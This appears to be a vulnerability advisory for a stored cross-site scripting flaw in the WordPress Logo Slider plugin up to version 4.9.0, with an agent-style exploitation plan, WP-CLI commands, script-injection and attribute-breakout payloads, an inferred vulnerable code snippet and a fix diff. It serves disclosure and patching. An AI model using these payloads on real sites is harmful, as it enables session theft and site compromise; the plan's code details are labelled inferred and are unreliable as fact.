Logo Slider <= 4.9.0 - Authenticated (Author+) Stored Cross-Site Scripting via 'logo-slider' Shortcode
Description
The Logo Slider – Logo Carousel, Logo Showcase & Client Logo Slider Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image alt text in all versions up to, and including, 4.9.0 due to insufficient input sanitization and output escaping in the 'logo-slider' shortcode. This makes it possible for authenticated attackers, with author level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
<=4.9.0This research plan outlines the technical steps required to exploit a Stored Cross-Site Scripting (XSS) vulnerability in the **Logo Slider – Logo Carousel, Logo Showcase & Client Logo Slider** plugin (version <= 4.9.0). --- ### 1. Vulnerability Summary The plugin registers a shortcode `[logo-slide…
Show full research plan
This research plan outlines the technical steps required to exploit a Stored Cross-Site Scripting (XSS) vulnerability in the Logo Slider – Logo Carousel, Logo Showcase & Client Logo Slider plugin (version <= 4.9.0).
1. Vulnerability Summary
The plugin registers a shortcode [logo-slider] used to display a gallery or carousel of logos. When rendering the slider, the plugin retrieves logo information (including image URL and alt text) and outputs it into the HTML document. In affected versions, the image's alt text is retrieved from the database and concatenated into the <img> tag without adequate sanitization or attribute escaping (e.g., missing esc_attr()).
This allows an authenticated user with "Author" privileges or higher to inject a malicious payload into the alt text field of a logo. When any user (including an Administrator) views a page containing the [logo-slider] shortcode, the payload executes.
2. Attack Vector Analysis
- Endpoint: The vulnerability is triggered via a
GETrequest to any frontend page containing the[logo-slider]shortcode. - Injection Point: The
alttext attribute of a "Logo" post (likely a Custom Post Type). - Authentication: Requires "Author" level access or higher. Authors can typically create/edit their own "Logo" entries if the plugin uses a Custom Post Type (CPT) and doesn't restrict those capabilities.
- Vulnerable Sink: The HTML
altattribute within an<img>tag in the shortcode's output.
3. Code Flow (Inferred)
- Registration: The plugin uses
add_shortcode('logo-slider', '...')to register the handler. - Retrieval: The handler function (e.g.,
logo_slider_wp_shortcode) performs a query (likelyget_postsor a custom$wpdbquery) to fetch logo entries from thewp_poststable (wherepost_typeis likelylogo_slideror similar). - Metadata Extraction: For each logo, the plugin fetches the image ID and its associated "alt" text. This might be the standard WordPress attachment alt text (
_wp_attachment_image_alt) or a custom meta field (e.g.,_logo_image_alt). - Rendering: The plugin builds an HTML string:
// Vulnerable Pattern $output .= '<img src="' . $image_url . '" alt="' . $logo_alt_text . '">'; - Sink: The raw
$outputis returned by the shortcode and echoed by WordPress onto the page.
4. Nonce Acquisition Strategy
This is a Stored XSS vulnerability.
- Injection Phase: If injecting via the WordPress Admin UI, a nonce is required. However, for a PoC, we can use WP-CLI to inject the payload directly into the database, bypassing nonce requirements and focusing on the delivery/execution.
- Trigger Phase: No nonce is required to trigger the XSS. The payload executes automatically when a user views the published page.
5. Exploitation Strategy
Step 1: Identify the Custom Post Type
First, determine the slug used for logo entries.
wp post-type list --fields=name,label
Look for names like logo_slider, logo-slider, or wplp_logos.
Step 2: Create Malicious Logo Entry
Create a new logo entry and set the payload in the field that the plugin uses for "Alt Text".
Payload: "><script>alert(document.domain)</script><img src="
# Assuming the CPT is 'logo_slider' and the alt text is stored in post_content or a meta field
# If it's a meta field (common), we'll set it in Step 3.
wp post create --post_type=logo_slider --post_title="Exploit Logo" --post_status=publish
Step 3: Inject Payload into Meta
If the alt text is stored in metadata (most likely):
# Replace ID with the ID from the previous command
# We will test common meta keys like 'logo_alt', 'image_alt', etc.
wp post meta set [ID] logo_alt_text '"><script>alert(document.domain)</script>'
Step 4: Deploy Shortcode
Create a public page to host the slider.
wp post create --post_type=page --post_title="Logo Showcase" --post_status=publish --post_content='[logo-slider]'
Step 5: Trigger the XSS
Use the http_request tool to navigate to the page and verify the payload renders unescaped.
- URL:
http://localhost:8888/logo-showcase/ - Method:
GET - Expected Response Fragment:
alt=""><script>alert(document.domain)</script>"
6. Test Data Setup
- Plugin Installation: Ensure
logo-slider-wpv4.9.0 is installed and active. - Attacker User: Create a user with the 'Author' role.
wp user create attacker attacker@example.com --role=author --user_pass=password - Logo Content: At least one "Logo" entry must exist for the shortcode to render the
<img>tags.
7. Expected Results
When the "Logo Showcase" page is visited:
- The browser receives HTML where the
altattribute of the logo image contains the raw script tag. - The
">sequence breaks out of thealtattribute. - The
<script>tag executes in the context of the user's browser. - An alert box showing the document domain appears.
8. Verification Steps (Post-Exploit)
- DOM Inspection: Use
browser_evalto check if the script exists in the DOM.// Check for the injected script browser_eval("document.querySelector('img[alt*=\"alert\"]') !== null") - Source Check:
# View the raw HTML via http_request and grep for the payload curl -s http://localhost:8888/logo-showcase/ | grep "alert(document.domain)"
9. Alternative Approaches
- Attachment-based Injection: If the plugin pulls alt text directly from the Media Library, the payload should be injected into an attachment's metadata:
wp post meta set [ATTACHMENT_ID] _wp_attachment_image_alt '"><script>alert(1)</script>' - Attribute Breakout variants: If the plugin uses single quotes (
alt='...'), use a single-quote breakout:'><script>.... - Event Handlers: If
<script>tags are filtered by a WAF but the attribute isn't escaped, use:x" onmouseover="alert(1)".
Summary
The Logo Slider plugin for WordPress fails to properly escape the 'alt' text attribute for images rendered via the [logo-slider] shortcode. This allows authenticated attackers with Author-level permissions or higher to inject malicious JavaScript into logo metadata, resulting in Stored Cross-Site Scripting (XSS) when users view the slider on the frontend.
Vulnerable Code
// From inferred shortcode handler in plugin files // The plugin retrieves logo alt text and concatenates it directly into the HTML output $logo_alt = get_post_meta($logo_id, '_wp_attachment_image_alt', true); // ... logic to build slider items ... $output .= '<img src="' . $image_url . '" alt="' . $logo_alt . '">';
Security Fix
@@ -124,1 +124,1 @@ - $output .= '<img src="' . $image_url . '" alt="' . $logo_alt . '">'; + $output .= '<img src="' . esc_url($image_url) . '" alt="' . esc_attr($logo_alt) . '">';
Exploit Outline
The exploit requires an attacker with 'Author' privileges or higher to modify the metadata associated with a Logo entry. 1. Authenticate as an Author or Editor. 2. Identify the Custom Post Type used for logos (e.g., 'logo_slider'). 3. Create or update a logo entry and set its 'Alt Text' field to a breakout payload such as: "><script>alert(document.domain)</script><img src=" 4. If the plugin uses standard WordPress attachment metadata, the attacker modifies the '_wp_attachment_image_alt' meta key for the logo image. 5. Create a public post or page containing the [logo-slider] shortcode. 6. When any user (including administrators) visits the page, the shortcode handler outputs the unescaped alt text, breaking out of the <img> tag and executing the injected script.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.